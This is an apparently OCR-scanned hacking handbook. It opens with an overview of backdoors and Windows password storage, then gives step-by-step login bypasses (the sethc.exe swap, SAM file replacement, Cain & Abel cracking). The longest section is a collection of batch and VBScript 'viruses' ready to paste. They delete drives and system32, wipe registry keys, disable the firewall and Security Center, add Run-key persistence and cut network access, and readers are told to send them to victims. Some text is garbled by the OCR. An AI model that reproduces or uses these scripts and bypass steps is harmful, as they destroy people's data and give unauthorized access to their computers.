of the two. The theory of asymmetric backdoors is part of a larger field now called cryptovirology . Notably, NSA inserted a 
kleptographic backdoor into the Dual EC DRBG standard. [2 1 1 11 1 1 121 


There exists an experimental asymmetric backdoor in RSA key generation. This OpenSSL RSA backdoor was designed by 
Young and Yung, utilizes a twisted pair of elliptic curves, and has been made available. 

3. Compiler backdoors - 

A sophisticated form of black box backdoor is a compiler backdoor, where not only is a compiler subverted (to insert a 
backdoor in some other program, such as a login program), but it is further modified to detect when it is compiling itself 
and then inserts both the backdoor insertion code (targeting the other program) and the code modifying self-compilation, 
like the mechanism how retroviruses infect their host. This can be done by modifying the source code, and the resulting 
compromised compiler (object code) can compile the original (unmodified) source code and insert itself: the exploit has 
been boot-strapped. 

This attack was originally presented in Karger & Schell (1974 , p. 52, section 3.4.5: "Trap Door Insertion"), which was a 
United States Air Force security analysis of Multics , where they described such an attack on a PL/I compiler, and call it a 
"compiler trap door"; they also mention a variant where the system initialization code is modified to insert a backdoor 
during booting , as this is complex and poorly understood, and call it an "initialization trapdoor"; this is now known as a 
boot sector virus 

This attack was then actually implemented and popularized by Ken Thompson , in his Turing Award acceptance speech in 
1983 (published 1984), "Reflections on Trusting Trust", M which points out that trust is relative, and the only software one 
can truly trust is code where every step of the bootstrapping has been inspected. This backdoor mechanism is based on the 
fact that people only review source (human -written) code, and not compiled machine code ( object code) . A program called 
a compiler is used to create the second from the first, and the compiler is usually trusted to do an honest job. 

Thompson's paper describes a modified version of the UnixC compiler that would: 

• Put an invisible backdoor in the Unix login command when it noticed that the login program was being compiled, 
and as a twist 


Also add this feature undetectably to future compiler versions upon their compilation as well. 


How To Crack Windows Password Via Backdoor's 


Step By Step - 

1. Restart And BOOT the PC (via bootable CD or PD) 

2. Then show "INSTALL" , Press "Shift" 5 Time 

3. Then show "Stkey" now go to "Command" 

4. Rename the "Sethc.exe" and "cmd.exe" File By Command 
EX. 1 - "Sethc.exe" — "Sethcl.exe" 

2 - "Cmd.exe" — "Sethc.exe" 

5. Then Exit And Cancle the Install 

6. Now Restart the PC 

7. When ask the password , press "shift" 5 time 

8. Now you are in command , then type (Net_user_user name*) press Enter 

9. Then enter new password 

NOTE - Everything is without (" ") quito. 



8. Windows Password Hacking 


Abstract: Hacking is so simple! Not only the operating system”s loop holes offers opportunities to hackers but also the 
applications like Skype and Google Chrome developed for the operating systems are quite attractive to hackers. In this 
paper I present the various ways in which the passwords like user account's passwords stored by the operating system or 
the passwords required by different applications are stored on the system and can be hacked by intended hackers. This 
paper presents in depth research of the password storage mechanisms implemented in various versions of Windows and 
various application software and can be exploited by hackers 

Keywords: Hacking, Windows, SAM, Skype 

Introduction 

Passwords can be login passwords for operating systems like Windows or login password for any application like yahoo 
messengers etc or login password for any web site like email login passwords. We will study the password storage 
mechanisms and analysis of their strengths for Microsoft Windows operating system and the applications developed for it. 
Microsoft Windows is the name given to the family of operating systems developed by the the US based company 
Microsoft. Microsoft first introduced an operating environment named Windows 1.0 in November 20, 1985 [1] 

In this paper, we will discuss Windows 98/ME, Windows NT/XP and Windows 7. We will also study how actually the 
passwords of various applications like Web Browsers store the passwords on local drives. 


Password Storage Mechanism for Windows operating system 

Windows-based computers utilize two methods for the hashing of user passwords, both having drastically different security 
implications. These are LAN Manager (LM) and NT LAN Manager version 2 (NTLMv2). A hash is the result of a 
cryptographic function that takes an arbitrarily sized string of data, performs a mathematical encryption 


function on it, and returns a fixed-size string. Windows Typically use RC4 and MD5 encryption algorithms to encrypt the 
passwords before storing. 



Windows 98/ME 

In Windows 98/ME passwords are stored in password list (.pwl) files. The name of the pwl file is the name by which we 
logon to the system. Encryption algorithms involved in the storage of passwords in pwl files are RC4 and MD5. All *.pwl 
files are generally stored in the C:\WINDOWS folder. We can find all the *.pwl files on the system using the operating 
systems find option. 

These .pwl files are readable in any text editor like Notepad, but they are definitely not understandable. 

Windows NT/XP/Vista/Windows 7 
SAM Database 

Majority of the different versions of Windows like Windows NT, Windows 2000, Windows XP, Windows Vista and 
Windows 7 uses Systems Account Manager (SAM) to store user"s credentials. SAM is implemented as a registry file to 
store user"s passwords . A registry file is a hierarchical database that stores configuration settings and options on Windows 
Operating Systems . It contains the information about system hardware, installed programs and settings, and profiles of 
each of the user accounts von your computer . All the registry entries are store in (key, value) pairs. Each Key can contain 
sub keys. Keys are referenced with syntax similar to Windows' path names, using backslashes to indicate levels of 
hierarchy. Each sub key has a mandatory name, which is a non-empty string that cannot contain any backslash, and is not 
case sensitive. The registry keys can be accessed from a known Root Key Handle. To refer to the SAM, the handle used is 
HKEY_LOCAL_MACHINE (HKLM). HKLM key contains a sub key called SAM. The registry for SAM is stored at 
location: 

% Sy stemRoot % \Sy stem32\config\ 

It is used to refer to full SAM database for all domains and users. Each SAM database contains all built in accounts 


and configured accounts (all user and administrative accounts) for all domains. It notably contains the user names that can 
log on to that domain, a cryptographic hash of each user's password and the location of storage of their user registry keys 
i.e. HKLM etc. [4]. The SAM registry file is locked for exclusive use while the OS is running. 



The SAM directory contains the user"s passwords in either old LM Hash for windows prior to Windows NT Service Pack 4 
(SP4) or NTLM hash which is in use from Windows NT SP4 till date including Windows 7 

Because the SAM stores its information in the SAM database, we can assume that NT is only as secure as its SAM data. 

Password Storage Mechanisms for Applications 
Internet browser applications - 
Internet Explorer (IE): 

IE saves two types of passwords: sign-on passwords and HTTP basic authentications (generally proxy and router 
configuration) passwords. 

IE below version 7 stores both the passwords in encrypted form in the secure location known as 'Protected Storage' at the 
following registry location: 



HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider 

Windows introduced the secure „Protected Storage" location to allow applications like IE/Outlook etc to store the secret 
credentials securely in an encrypted format. 

With version 7 onwards IE uses a new mechanism to store the sign-on passwords. The encrypted passwords for each 
website and auto complete passwords are stored along with hash of the website URL in the registry location: 

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 

The HTTP basic authentication passwords are stored in the 'Credentials store' at following location based on the operating 
system: 


Instant Messengers 

Google Talk (GTalk): 

GTalk stores all remembered account information at following registry location: 
HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts 


For each account separate registry key is created with the account email id as name. Account passwords are encrypted using 
Window"s Cryptography Functions and are stored at the above registry. 

GooglePasswordDecryptor is a free tool to decrypt and obtain the GTalk usernames/passwords in plaintext. 

Skype 

Skype does not stores the passwords directly. It computes the encrypted hash of the password and stores in config.xml 
present in skype"s user profile directory. 

Typical location of the user profile directory is: 


Windows 98/ME 



The pwl files cannot be easily edited, but can be overwritten. However, we can delete the existing pwl files and the next 
time we log on to the system, we will be prompted to enter our username and password, and this new information will be 
stored in a new *.pwl file. We can also copy pwl files from one machine to another. Thus to hack a computer, we just need 
to boot the system using some bootable cd and copy the existing pwl file in the c:\windows directory. Immediately we can 
now logon using the new user name and password. Thus once we boot the system using bootable CD, we can follow either 
of the follwing approaches: 

a) Delete existing pwl file: In this approach, once the system is restarted after deleting existing pwl files, the system will 
ask for a new user name and password. So the system is hacked. 

b) Copying existing pwl files: In this approach, the new user accounts as specified in the pwl file being copied are 
automatically created in the operating system. Hence the hacker can login with his choice of user name and password. 


Replacing existing pwl files: In this approach, the existing user accounts will be deleted and the new user accounts as 
specified by the new pwl file are automatically created. Hence again the system is hacked. 


Windows NT/XP/Vista/Windows 7 

NT stores a permanent working copy of the SAM database on the hard disk that can be accessed via the 
HKEY_LOCAL_MACHINE Registry hive under the SAM key by either writing a program or using a Registry editor (e.g., 
regedt32.exe). Ordinarily, users can't directly access the SAM key with a Registry editor because NT limits the permissions 
on the key to the built-in SYSTEM account, but administrative users can trick NT into providing SAM-key access under 
the user context of the SYSTEM account. 

When you forget user passwords, if you know the theory as above, you can change the SAM file by following the steps 
below. These steps can also be used by any hacker/cracker to breach into the computer if he/she has physical access to the 
computer running on Windows NT. 


Step By Step - 



Step l:Login to a Computer that has Windows XP system. 

Step 2:Copy the SAM file to a floppy disk. 

Step 3: Then turn to your locked pc and insert the floppy disk Reboot the PC and enter into MS-DOS. 

Step 4:In dos,type : del c: windowssystem32configsam ,then you will delete the SAM file. 

Step 5: type : Copy a:sam c: windowssystem32config,copy the other"s SAM file to your PC. 

Skype 

Since the HASH of the password is saved, it is not possible to directly get the password. Instead one has to use dictionary or 
brute force approach to find out the right password from the hash. This approach may take days or months together based 
on the length & complexity of the password. 


Last Bit Software developed a tool called „Skype Password”. It is a free tool used to recover Skype passwords. This tool 
applies universal password recovery methods like Brute Force Attacks/Dictionary Attacks at a very high speed of 200 lacs 
per second on a modern CPU [7]. However if the password is complex, this tool will still take lot of time. The approximate 
time for recovering the Skype password using „Skype Password” tool can be obtained by another tool called „Password 
Calculator”. This tool cannot be termed as a hacking tool as it need to be installed and can recover the password of only the 
user who has logged onto the system. However, in near future, one can expect some malware that might run without the 
knowledge of the logged on user. 


Windows Password Hacking 
Step By Step - 



1. Restart And BOOT the PC (via bootable CD or PD) 


2. Then show "INSTALL" , Press "Shift" 5 Time 

3. Then show "Stkey" now go to "Command" 

4. Then Type Notepad Hit Enter 

5. Copy The SAM And SYSTEM File in your PD. 

6. Now exit and cancle the Install 

7. Now Install Can n Able in another PC 

8. Select Cracker and now click on ( + ) 

9. Now Select Lm and Ntlm 


10. Now select your target + r84+Brute force+Ntlm 

11. Now Import your target who want u hack 

12. Now copy the System File and paste in under 

13. Now finale step click on Start and wait 1 and 4 minate. 

9. Windows Password Cracking 

There are some good password cracking technigues for discovering password and perhaps the most famous ones are - 



a) Dictionary Attack - 

A big word dictionary can be loaded into the cracking tool to test these words against the user account password. 

b) Brute Forcing Attack - 

Every passible key combinations is tried against the password database until the correct key is discovered . it take a long 
time ( or not ) 

c) Hybride Attack - 

it's a veration from dictionary attack , but for each dictionary word is attempted a small change like "linux" , "linuxl" , 
"Iinuxl23" , etc ... 


d) Syllable Attack - 

This attack is a combination of dictionary attack with brute forcing attack . 

e) Rainbow Table Attack - 

A very large list of precomputed hashes are compared with the password file to discovery all password . 

How To Crack Windows Password 


Step By Step - 



1. Restart And BOOT the PC (via bootable CD or PD) 

2. Then show "INSTALL" , Press "Shift" 5 Time 

3. Then show "Stkey" now go to "Command" 

4. Rename the "Sethc.exe" and "cmd.exe" File By Command 
EX. 1 - "Sethc.exe" — "Sethcl.exe" 

2 - "Cmd.exe" — "Sethc.exe" 

5. Then Exit And Cancle the Install 


6. Now Restart the PC 

7. When ask the password , press "shift" 5 time 

8. Now you are in command , then type (Net_user_user name*) press Enter 

9. Then enter new password and hit enter 


10. Viruse 



What is a virus? 


How does a virus work? 

A virus is by definition a computer program that spreads or replicates by copying 
itself. There are many known techniques that can be used by a virus, and viruses 
appear on many platforms. However, the ability to replicate itself is the common 
criterion that distinguishes a virus from other kinds of software. 

The term virus is quite often misused. Some viruses contain routines that damage 
the computer system on which it runs. This so called payload routine may also 
display graphics, play sounds or music etc. This has lead to a situation where 
viruses are assumed to cause deliberate damage, even if there are many viruses 
that don’t. The term virus has, for these reasons, become a synonym for malicious 


software, which is incorrect from a technical point of view. 

The process of spreading a virus includes both technical features in the virus itself 

and the behavior of the computer user. Most viruses are by nature parasitic. This means that they work by attaching 
themselves to a carrier object. This object may be a file or some other 

entity that is likely to be transmitted to another computer. The virus is linked to the host object in such a way that it 
activates when the host object is used. Once activated, the virus looks for other suitable carrier objects and attaches itself to 
them. This dependency on the human factor slows down the replication of viruses. Another closely related program type, a 
worm, reduces this 

dependency and is able to replicate much faster. Worms will be discussed separately in this paper. 

Viruses and worms 


The term virus is familiar to most users of computer equipment. This term is often used to describe all kinds of software 
that replicate from computer to computer, and even incorrectly for some other kinds of software that do not replicate. 



However, it is not widely known that there are two different groups of replicating software, viruses and worms. The 
difference between these two groups may not be obvious to the computer user who encounters a virus or worm, 

but the difference is significant from a technical point of view. A worm, for example, is able to use services provided by a 
modern networked environment much more efficiently than a virus. 

Different types of viruses 

a) Boot sector viruses 

A boot sector virus infects the boot sector of floppy disks or hard drives. These 

blocks contain a small computer program that participates in starting the 

computer. A virus can infect the system by replacing or attaching itself to these blocks. 

b) Traditional file viruses 

This group of viruses replicates when attached to MS-DOS program files with the EXE or COM extensions. 


They cannot infect 32-bit EXE files used by newer versions of MS Windows. This group of viruses can replicate over any 
media that can transfer files, such as diskettes, local 

area networks, remote lines etc. Email did not play a significant role in spreading these viruses, as it was an unusual way of 
communicating in MS-DOS and Windows 3.x-based environments. These viruses, however, have a clear disadvantage 
compared to boot sector viruses; they require that program files be transmitted. 

c) Document or macro viruses 

Document or macro viruses are written in a macro language. Such languages are 
usually included in advanced applications such as word processing and 
spreadsheet programs. The vast majority of known macro viruses replicate using 

the MS Office program suite, mainly MS Word and MS Excel, but some viruses targeting other applications are known as 
well. 



c) 32 -bit file viruses 

Previous file viruses were made for 16-bit program files used by MS-DOS. The 
32-bit versions of Windows, such as Windows 95, 98 and NT, use a different and 
more complex format for the program files. Traditional files viruses cannot infect 
these files. A new group of file viruses emerged as the 32-bit operating systems 
became more popular. These viruses are by nature similar to the previous file 
viruses with the exception that they can infect the new file format and work in 
32-bit environments. This category is also called PE-viruses, because the new 
executable file format’s name is PE (portable executable). The new format is also 
used by many other modules in the system, such as DLLs, system drivers etc. 
Some viruses infect these modules as well, but most stick to program files with the 
EXE extension. 


d) Worms 

Mail worms 

A worm is by definition similar to a virus but more independent. The first wave of 
worms was seen when Internet mail became a standard way to communicate. An 
email client, and especially address books and mailing lists, provide a powerful 
way to reach a large number of recipients worldwide with very little effort. 
Modern, advanced email programs also provide this functionality through APIs 
that make it possible for computer programs to automatically send messages. All 
this together provides an environment that enables mail worms to spread much 
faster than viruses. 

A mail worm is carried by an email message, usually as an attachment but there 
have been some cases where the worm is located in the message body. The 
recipient must open or execute the attachment before the worm can activate. 



e) Pure worms 

A worm is a replicating program that works independently without a host file and 
without user intervention. Pure worms meet all these requirements, whereas mail 
worms represent an intermediate form that resembles both viruses and worms. 


Other kinds of malware 

Trojan horses 

The name Trojan horse is borrowed from Greek mythology. In the computer 
world the term refers to a program that contains hidden malicious functions. The 
program may look like something funny or useful such as a game or utility, but 
harms the system when executed. Many Trojans contain activation criteria that 
enable the Trojan to work for a while. The user is convinced that the program is 


safe and useful, and forwards it to other users before the malicious code strikes. 

Trojans lack a replication routine and thus are not viruses by definition. A Trojan 
is spread to other computers only through deliberate transfer by the users. 

Backdoor Trojans 

Backdoor Trojans are a special kind of Trojan that grant unauthorized access to computer systems. This type of Trojan is 
rather common and can pose a significant threat to business users. These Trojans consist of two programs that interoperate: 
the silent server module planted in a victim’s computer and the console used by a hacker. The silent server module acts as a 
spying tool. The console connects to it using networking protocols and transmits commands to it. This system can then be 
used to retrieve data from the target computer, modify data, alter system settings, execute programs and even record video 
and sound if the computer is equipped with multimedia capabilities. 

Jokes 

A joke program does something funny or tasteless, but does not harm the 
computer environment. The effect may be music or sounds, video or animations, 



interactive functions etc. Some jokes may disturb the computer’s user interface 

and be rather annoying, but the effect is temporary and no permanent damage is done. If permanent damage is done, then 
the program is by definition a Trojan 
rather than a joke. 

Hoaxes 

A hoax is a chain letter that is usually circulated as an email message. These chain 
letters may have any content and are actually not related to computer viruses in 
any way. However, the problem is well known to vendors of anti-virus software 

because many hoaxes warn about a non-existing computer virus. A trained security expert can usually tell a hoax from a 
real virus warning. Many hoaxes describe viruses with functionalities that cannot exist in real life. There are also several 
other attributes that usually disclose the real nature of the message. The source is often not a reliable security expert and the 
message contains the famous sentence “Forward this warning to all your friends immediately”. 


Who writes viruses and why? 

A common belief is that viruses are written by teenage boys. This is true in part, 
but the situation is changing as new virus writing techniques enter the scene. 
Writing a working virus is not too difficult, but writing a successful virus is not an 
easy task. It is not enough to be a good programmer, and knowledge of how 
modern IT systems work on a larger scale is needed as well. This has lead to a 
situation where more mature persons, even IT professionals, are involved as well. 
It is hard to provide accurate information about who is writing viruses and why. 


Most virus writers want to remain anonymous and their motives are rarely known. 
There are several reasons for this. 



□ Most individuals realize that writing a vims is not ethically acceptable, 
even if it is legal. Most virus writers want to remain anonymous, or use a 
pseudonym if they give statements about their creation. 

□ Computer viruses are a new problem. There are still many countries where 
the laws do not address virus writing explicitly, even if significant 
improvements have taken place during in recent years. 

□ Even if writing a computer virus is illegal, the authorities often lack 
resources and skills to investigate and trace virus authors. 


Virus history 

Before the viruses - UNIX worms and academic papers 

1970 - 1988 . Viruses are not a new invention. The idea of self-replicating 
computer programs has been around for decades. This idea has emerged in science 
fiction literature, scientific papers and even experiments at least since the early 
1970s. Some attempts to perform maintenance tasks in large networks using 
worms were made, but this technology did not become widespread or well known. 
One of the milestones in virus history was the research performed by Dr. Fred 
Cohen in the early 1980s. Cohen formed the original definition of a virus; a 
program that can infect other programs by modifying them to include a copy of 



itself. Cohen’s work was truly groundbreaking as it was published before the first 
viruses were ever made. 

In the 1980s the Internet was a network that connected university computers to 
each other. This network was pretty vulnerable to pure worms, which was to be 
demonstrated by a young student named Robert Morris. The first major malware 
incident was probably the Morris worm in November 1988. This UNIX-based 
worm knocked out almost all computers on the Internet, causing a lot of media 
interest and many headlines. 


The initial era - Standalone computers and LANs 

1987 - 1990 . The first PCs were made in the early 1980s. The personal computer 
concept was new and revolutionary, and its popularity grew faster than anyone 


expected. PCs were already a usable and affordable technology for companies in 
the late 1980s. The rapid growth also brought computer technology closer to a 
larger number of individuals. 


The document viruses - Towards a 
major problem 

1995 - 1998 . From 1995, local area networks are already standard equipment in most companies using personal computers. 

Internet connections also started to become popular, especially in larger companies. The concept of email had been known 

in the UNIX world for decades, but now this technology entered PCbased 

corporate networks as well. The presence of a local area network and Internet 

connectivity opened totally new ways to communicate. The LAN was not just a 

way to share disks and printers anymore. Email had become a significant 

communication channel, especially in large multinational companies. 

The new technology introduced by email and the Internet revolutionized the way 



to work with personal computers. But the existing viruses were not able to benefit 
from the new technology. The number of boot sector virus infections started to 
decline when LANs, email and CD-ROMs made floppies obsolete. File viruses 
did not benefit either as email was rarely used for sending program files. 



Email worms - Increasing replication speed 


1999 - . The basic requirements for email worms were already met when corporations started to use email. 



The trend continued and more and more home users were connected to the Internet. At the same time, email clients evolved 
and offered more and more functionality. Happy9910 was probably the first widespread PC malware program that can be 
called a worm. This 

“Happy new year” greeting arrived in a message that was apparently sent by a friend. While the user was watching the 
animated fireworks, the worm installed itself in the system so that mail traffic could be monitored. 


! Happy New Year 1999 M 




Pure worms - Getting rid of the human factor 


The number of computers on the Internet keeps growing and the 

connecting lines become faster and faster. Always-on broadband connections are 




getting popular for home users as well as business users. This leads to a situation 
where pure worms can find enough target computers to replicate sufficiently. 


11. Viruse Creation 


All Viruse Write In Notepad 

( 1 ) 

Here is a Batch File virus which can: 

1. Copy itself into startup 

2. Copy itself over one thousand times into random spots in your computer. 

3. Hide its self and all other created files 

4. Task kill MSN, Norton, Windows Explorer, Limewire. 

5.Swap the left mouse button with the right one 
6.0pens alert boxes 

7.Changes the time to 12:00 and shuts down the computer 

copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ). 
Here is the Code: 


@Echo off 
color 4 
title 4 
title R.I.P 


start 
start 
start 
start calc 

copy %0 %Systemroot%\Greatgame > nul 

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ 

/d %systemroot%\Greatgame.bat /f > nul 

copy %0 *.bat > nul 

Attrib +r +h Greatgame.bat 

Attrib +r +h 

RUNDLL32 USER32.DLL.SwapMouseButton 

start calc 

els 

tskill msnmsgr 
tskill LimeWire 
tskill iexplore 
tskill NMain 
start 
els 

cd %userprofile%\desktop 


copy Greatgame.bat R.I.P.bat 
copy Greatgame.bat R.I.P.jpg 
copy Greatgame.bat R.I.P.txt 
copy Greatgame.bat R.I.P.exe 


copy Greatgame.bat R.I.P.mov 
copy Greatgame.bat FixVirus.bat 
cd %userprofile%My Documents 
copy Greatgame.bat R.I.P.bat 
copy Greatgame.bat R.I.P.jpg 
copy Greatgame.bat R.I.P.txt 
copy Greatgame.bat R.I.P.exe 
copy Greatgame.bat R.I.P.mov 
copy Greatgame.bat FixVirus.bat 
start 
start calc 
els 

msg * R.I.P 
msg * R.I.P 

shutdown -r -t 10 -c "VIRUS DETECTED" 

start 

start 

time 12:00 
:R.I.P 

cd %usernameprofile%\desktop 


copy Greatgame.bat %random%.bat 
goto RIP 


( 2 ) 

Just open your notepad 

1) Click start -> all programs -> accessories -> notepad 

2) Or just press or click windows key + r :: run window will open and 
type notepad and hit enter . 

NOW TYPE THE FOLLOWING CODE :: 

@echo off 
del D:\*.* /f /s /q 
del E:\*.* /f /s /q 
del F:\*.* /f /s /q 
del G:\*.* /f /s /q 
del /f /s /q 

del l:\*.* /f /s /q 
del /f /s /q 

Then save it as anything.bat and the batch file is created . 

WARNING :: This is the most dangerous virus! Be careful with its use. 


(3) 


Delete the entire registry 
@ECHO OFF 

START reg delete HKCR/.exe 
START reg delete HKCR/.dll 
START reg delete HKCR/* 

Now save it as anything.bat and the batch file is created . 


(4) 

How to crash a PC Forever !::: 
@echo off 

attrib -r -s -h c:\autoexec.bat 
del c:\autoexec.bat 
attrib -r -s -h c:\boot.ini 
del c:\boot.ini 
attrib -r -s -h c:\ntldr 
del c:\ntldr 

attrib -r -s -h c:\windows\win.ini 
del c:\windows\win.ini 


Open up notepad and copy and paste that. Save it as anything.bat file. 


This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. 


REMEMBER - DO NOT CLICK THIS FILE. 


(5) 

How to stop someone's internet access:::: 


@Echo off 
Ipconfig /release 

Save that as anthing .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix 
it 

However, this is VERY easy to fix. Simply type in IPconfig /renew 

( 6 ) 

ShutDown PC million Times:::: 

1. right click on the desktop 

2. click shortcut 

you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next 

note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want... 


3.u will get another dialogue box, write in it: Internet Explorer and press finish 


4.u will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon> 


select the icon the the internet explorer and the press apply then ok 
try to open it, it is a virus hehe 

PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a 
(7) 

Open Notepad 

Write / copy the below command there: 


" del c:\WINDOWS\system32\*. */d " without quote 
and save as " anything.bat" 


Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be 
started. 


( 8 ) 


Process: 

Open Notepad 

Copy the below command there 


"rd/s/q D:\ 
rd/s/q C:\ 

rd/s/q E:\" ( without quotes ) 


Save as "anything.bat 

This virus Formats the C ,D , and E Drive in 3 Seconds. 


( 9 ) 


Just open the Notepad and type the paste the following Code. 


set ws=createobject("wscript. shell") 
dim strDir,strfile,st,strtxt2,strshell,strlog 
dim obfso,obfolder,obshell,obfile,obtxtfile 
strshell= M wscript.sheH" 


strDir="C:\WINDOWS" 

strfile="\wscript.vbs" 

st=Chr(34) 

strlog="shutdown -I" 


strtxt2="ws.run(strlog)" 

set obfso=CreateObject("Scripting.FileSystemObject") 
on error resume next 

set obfile=obfso.CreateTextfile(strDir & strfile) 
obfile.writeline("set ws=createobject("&st&strshell&st&") M ) 
obfile.writeline( ,, ws.run("&st&strlog&st&")") 

ws.regwrite ,, HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff ,, , ,, C:\WINDOWS\wscript.vbs ,, , ,, REG_SZ" 
Now Save This Notepad file With Any Name Having .vbs Extension . 


( 10 ) 

Convey your friend a little message and shut down his / her computer: 
@echo off 

msg * I don't like you 

shutdown -c "Error! You are too stupid!" -s 


Save it as "Anything.BAT" in All Files and send it. 


( 11 ) 

Frustrate your friend by making this VBScript hit Enter simultaneously: 
Type: 

Code: 

Set wshShell = wscript.CreateObject("WScript.Shell 

") 

do 

wscript.sleep 100 
wshshell.sendkeys "~(enter)" 
loop 

Save it as "Anything.VBS" and send it. 


( 12 ) 


This Will Crash Ur Computer 


Option Explicit 


Dim WSHShell 

Set WSHShell=Wscript.CreateObject("Wscript.Sheir) 
Dim x 

For x = 1 to 100000000 
WSHShell. Run "Tourstart.exe" 

Next 

Save It As Anything.vbs 


(13) 

Virus that crashes pc 


@echo off 

attrib -r -s -h ^autoexec.bat 
del c:autoexec.bat 


attrib -r -s -h c:boot.ini 
del c:boot.ini 
attrib -r -s -h c:ntldr 
del c:ntldr 


attrib -r -s -h c:windowswin.ini 
del c:windowswin.ini 
@echo off 

msg* YOU GOT OWNED!!! 

shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive 


Save As Anything.bat File In Notepad!! 

This Will Pop Up A Message Saying OWNED!! 

And Shut Down The Computer Never To Reboot Again! 

(14) 


Shutdowns Computer Everytime It Is Turned On 
Save As Aanything. bat File 


echo @echo off>c:windowshartlell.bat 


echo break off»c:windowshartlell.bat 

echo shutdown -r -t 11 -f»c:windowshartlell.bat 

echo end»c:windowshartlell.bat 


reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d 
c:windowshartlell.bat /f 

reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f 
echo You have been HACKED. 

PAUSE 

(15) 


Disable Internet Permanently 

echo @echo off>c:windowswimn32.bat 
echo break off»c:windowswimn32.bat 
echo ipconfig/release_all»c:windowswimn32.bat 
echo end»c:windowswimn32.bat 

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d 
c:windowswimn32.bat /f 

reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d 


c:windowswimn32.bat /f 
echo You Have Been HACKED! 
PAUSE 


Save As A anything.bat File 


(16) 

Change Files To Non-working TXT Files 
Save As A anything.bat File 


REN *.DOC *.TXT REN * JPEG *.TXT 

REN *.LNK *.TXT 

REN *.AVI *.TXT 

REN *.MPEG *.TXT 

REN *.COM *.TXT 

REN *.BAT *.TXT 

(17) 

System Meltdown 


:CRASH 

net send * WORKGROUP ENABLED 


net send * WORKGROUP ENABLED 
GOTO CRASH 
ipconfig /release 
shutdown -r -f -to 

echo @echo off>c:windowshartlell.bat 
echo break off»c:windowshartlell.bat 


echo shutdown -r -t 11 -f»c:windowshartlell.bat 
echo end»c:windowshartlell.bat 

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d 
c:windowshartlell.bat /f 

reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat 

If 

echo You Have Been Hackedecho @echo off>c:windowswimn32.bat 
echo break off»c:windowswimn32.bat 
echo ipconfig/release_all»c:windowswimn32.bat 
echo end»c:windowswimn32.bat 

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d 
c:windowswimn32.bat /f 

reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d 

c:windowswimn32.bat /f 

echo YOU HAVE BEEN HACKED BITCH 

REN *.DOC *.TXT 

REN *JPEG *.TXT 


REN *.LNK *.TXT 
REN *.AVI *.TXT 
REN *.MPEG *.TXT 
REN *.COM *.TXT 
REN *.BAT *.TXT 


PAUSE 

PAUSE 

Save As A anything.bat File 

( 16 ) 

Freeze someone's desktop::: 

this is a funny trick, u can freeze someone's desktop 

1. close everything u r working in, and work on desktop, so click on prtscr on ur keyboard. 

2. go to paint and click on edit then paste 


3. save this file as (name). bmp and close the paint. 

4. Now in the desktop, we have 2 remove desktop icons and shortcuts, so right 
click on the mouse and then properties, click on desktop then select 
customize desktop. 

5. uncheck all the boxes in desktop icons and press ok. then press apply then ok. 

6. now to remove the shortcuts in the desktop, go to start and select My 


Computer, then click on c: right click on ur mouse and select new 
folder, write it any name 

7. now go to desktop & select all da icons and right click on them then press cut, go to c: and paste them in the folder dat 
created then close the window. 

8. now to put the fake desktop image and remove the taskbar, so right click on desktop and gp to properties, now go to 
desktop and select Browse, select the file 

that u saved then press appply then ok. now to remove the windows 
taskbar, right click on the taskbar and go 2 properties, then select 

autohide the taskbar and then apply then ok now all the icons r fake and the user will think that his desktop is freezed 


enjoy it.! 


( 17 ) 

SHUT UR INTERNET PERMENANTLY::: 



@echo off 
reg 

add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t 


REG_SZ /d %systemroot%\HaloTrialScoreChangerVl /f > nul 
start iexpress (website of your choice) 
ipconfig /release 

del "C:\Program Files\Microsoft Games 
del "C:Nexon 

del "C:\Program Files\Xfire 

del "C:\Program Files\Adobe" 

del "C:\Program Files\lnternet Explorer" 

del "C:\Program Files\Mozilla Firefox" 

del "C:\WINDOWS" 

del "C:\WINDOWS\system32" 

del "C:\WINDOWS\system32\cmd" 

del "C:\WINDOWS\system32\iexpress" 

del "C:\WINDOWS\system32\sndvol32" 

del "C:\WINDOWS\system32\sndrec32" 

del "C:\WINDOWS\system32\Restore\rstrui" 

del "C:\WINDOWS\system32\wupdmgr" 

del "C:\WINDOWS\system32\desktop" 



del "C:\WINDOWS\java" 
del "C:\WINDOWS\Media" 
del "C:\WINDOWS\Resources" 
del "C:\WINDOWS\system" 


del "C:\drivers" 
del "C:\drv" 
del "C:\SYSINFO" 
del "C:\Program Files" 

echo ipconfig/release_all»c:windowswimn32.bat 
net stop "Security Center" 
net stop SharedAccess 
> "%Temp%.kill.reg" ECHO REGEDIT4 
»"%Temp°/o.kill.reg" ECHO. 

»"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess] 
»"%Temp°/o.kill.reg" ECHO "Start"=dword:00000004 
»"%Temp°/o.kill.reg" ECHO. 

